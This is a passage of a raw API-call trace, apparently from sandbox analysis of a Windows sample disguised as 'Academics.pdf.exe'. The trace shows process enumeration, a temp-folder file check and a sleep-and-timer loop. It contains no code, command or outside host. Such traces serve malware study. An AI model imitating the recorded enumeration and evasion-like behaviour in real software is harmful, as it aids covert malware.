th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0301.748] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.749] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0301.750] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0301.751] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0301.751] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0301.752] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0301.753] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0301.754] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0301.755] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0301.756] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0301.757] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0301.758] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0301.759] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0301.760] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0301.760] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0301.761] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0301.762] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0301.763] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0301.764] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0301.765] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0301.766] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0301.767] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.768] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0301.769] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.769] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0301.770] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0301.771] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0301.772] CloseHandle (hObject=0x294) returned 1 [0301.772] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0301.772] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0301.772] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0301.774] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.775] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0301.776] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0301.777] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0301.778] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0301.779] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0301.779] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0301.780] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0301.781] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0301.782] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0301.798] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0301.798] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0301.798] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0301.798] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0301.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0301.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0301.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaa8 [0301.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0301.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0301.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa310 [0301.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0301.799] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf2a0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0301.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0301.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0301.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0301.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0301.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0301.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0301.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0301.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0301.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0301.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0301.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0301.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0301.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0301.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0301.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0301.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0301.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0301.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0301.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0301.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0301.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0301.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0301.800] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\8x8x8")) returned 0x2020 [0301.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0301.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0301.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0301.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0301.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0301.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0301.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0301.800] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0301.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0301.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0301.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0301.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0301.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0301.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0301.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0301.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0301.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0301.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0301.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0301.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0301.801] timeGetTime () returned 0x4b662 [0301.801] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.801] Sleep (dwMilliseconds=0xa) [0301.814] timeGetTime () returned 0x4b671 [0301.814] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.814] Sleep (dwMilliseconds=0xa) [0301.829] timeGetTime () returned 0x4b681 [0301.829] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.829] Sleep (dwMilliseconds=0xa) [0301.845] timeGetTime () returned 0x4b691 [0301.845] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.845] Sleep (dwMilliseconds=0xa) [0301.863] timeGetTime () returned 0x4b6a0 [0301.863] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.863] Sleep (dwMilliseconds=0xa) [0301.877] timeGetTime () returned 0x4b6b0 [0301.877] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.877] Sleep (dwMilliseconds=0xa) [0301.892] timeGetTime () returned 0x4b6bf [0301.892] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.892] Sleep (dwMilliseconds=0xa) [0301.907] timeGetTime () returned 0x4b6cf [0301.907] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.907] Sleep (dwMilliseconds=0xa) [0301.923] timeGetTime () returned 0x4b6df [0301.923] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.923] Sleep (dwMilliseconds=0xa) [0301.938] timeGetTime () returned 0x4b6ee [0301.938] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.939] Sleep (dwMilliseconds=0xa) [0301.958] timeGetTime () returned 0x4b6fe [0301.958] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.958] Sleep (dwMilliseconds=0xa) [0301.978] timeGetTime () returned 0x4b70d [0301.978] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.978] Sleep (dwMilliseconds=0xa) [0301.985] timeGetTime () returned 0x4b71d [0301.985] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.985] Sleep (dwMilliseconds=0xa) [0302.001] timeGetTime () returned 0x4b72d [0302.001] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.001] Sleep (dwMilliseconds=0xa) [0302.016] timeGetTime () returned 0x4b73c [0302.017] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.017] Sleep (dwMilliseconds=0xa) [0302.032] timeGetTime () returned 0x4b74c [0302.032] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.032] Sleep (dwMilliseconds=0xa) [0302.050] timeGetTime () returned 0x4b75b [0302.050] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.050] Sleep (dwMilliseconds=0xa) [0302.063] timeGetTime () returned 0x4b76b [0302.063] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.063] Sleep (dwMilliseconds=0xa) [0302.079] timeGetTime () returned 0x4b77b [0302.079] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.079] Sleep (dwMilliseconds=0xa) [0302.095] timeGetTime () returned 0x4b78a [0302.095] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0302.095] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0302.095] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0302.095] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0302.095] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0302.095] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.095] Sleep (dwMilliseconds=0xa) [0302.110] timeGetTime () returned 0x4b79a [0302.110] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.110] Sleep (dwMilliseconds=0xa) [0302.126] timeGetTime () returned 0x4b7a9 [0302.126] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.126] Sleep (dwMilliseconds=0xa) [0302.141] timeGetTime () returned 0x4b7b9 [0302.141] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.141] Sleep (dwMilliseconds=0xa) [0302.160] timeGetTime () returned 0x4b7c9 [0302.160] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.160] Sleep (dwMilliseconds=0xa) [0302.172] timeGetTime () returned 0x4b7d8 [0302.172] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.172] Sleep (dwMilliseconds=0xa) [0302.188] timeGetTime () returned 0x4b7e8 [0302.188] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.188] Sleep (dwMilliseconds=0xa) [0302.203] timeGetTime () returned 0x4b7f7 [0302.204] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 